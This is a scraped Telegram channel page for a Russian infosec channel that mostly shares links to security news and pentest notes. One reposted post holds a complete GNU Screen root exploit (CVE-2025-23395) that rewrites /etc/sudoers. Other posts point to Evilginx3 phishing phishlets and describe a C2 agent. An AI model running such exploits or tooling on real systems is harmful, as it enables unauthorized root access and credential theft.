Fsecurity | HH

前往频道在 Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

显示更多

俄罗斯216 788 技术与应用31 062

2 017

订阅者

-224 小时

-27 天

-1230 天

117

帖子浏览量

~ 6624 小时

~ 7948 小时

5.80%

参与率

~ 3

每日帖子数

Ads index

beta

帖子存档

2 018

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

2 018

🔗Ссылка: https://www.securitylab.ru/news/559343.php

2 018

🔗Ссылка: https://cyberskies.org/posts/CPTS

2 018

Repost from Adaptix Framework

Добавлю)) https://github.com/badsectorlabs/ludus_adaptix_c2

2 018

🔗Ссылка: https://www.yeswehack.com/learn-bug-bounty/practical-guide-path-traversal-attacks

2 018

🔗Ссылка: https://pentestnotes.ru/notes/bitrix_pentest_full/

2 018

Repost from Ralf Hacker Channel

Несколько часов назад была сильно обновлена утилита certipy. Обратим внимание, что в документации также появилось описание техники ESC16... #redteam #pentest #ad #adcs

2 018

Repost from 1N73LL1G3NC3

CVE-2025-23395 Screen LPE exploit

#!/bin/sh

F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) &gt; $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
        echo "[+] bl1ng bl1ng, we got it"
        sudo sh
else
        echo "[-] exploit failed :("
fi
rm -rf $F $L

Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395

2 018

Repost from AP Security

#soc FalconHound С момента своего выхода в 2016 году BloodHound стал основным инструментом для специалистов по наступательной безопасности, позволяющим выявлять неправильные конфигурации в Active Directory. Основная цель FalconHound - обеспечить использование всех различных событий в системе и обновление базы данных BloodHound для улучшения качества работы синих команд при его использовании

2 018

🔗Ссылка: https://habr.com/ru/articles/908814/

2 018

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

2 018

🔗Ссылка: https://opennet.ru/63237/

2 018

🔗Ссылка: https://www.securitylab.ru/news/559318.php

2 018

🔗Ссылка: https://github.com/simplerhacking/Evilginx3-Phishlets

2 018

Repost from Adaptix Framework

С версии 0.5 агент gopher будет также работать и в Windows системах... Еще в данном агенте появится socks5 прокси... А так как агент синхронный, то для каждого канала поднимаются свой поток и отдельное соединение с сервером C2. Туннель способен выдерживать даже многопоточные сканеры)

2 018

Repost from Кибер ПТУ | Кибербезопасность

Смотрим, как нас будут атаковать Держите плейбук, а точнее сшитые вместе кучу плейбуков с векторами атак по абсолютно разным направлениям уибербеза и IT: от цепочек поставок и дипфейков до зеродеев и IoT-а. В общем, сюда запихнули почти все известные вам ИБшные термины. #BaseSecurity 🧠 Твой Пакет Знаний | 👨‍🏫 Менторство ИБ 📂 Другие каналы

2 018

🔗Ссылка: https://habr.com/ru/articles/909188/

2 018

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

2 018

🔗Ссылка: https://www.securitylab.ru/news/559299.php

2 018

🔗Ссылка: https://www.securitylab.ru/news/559296.php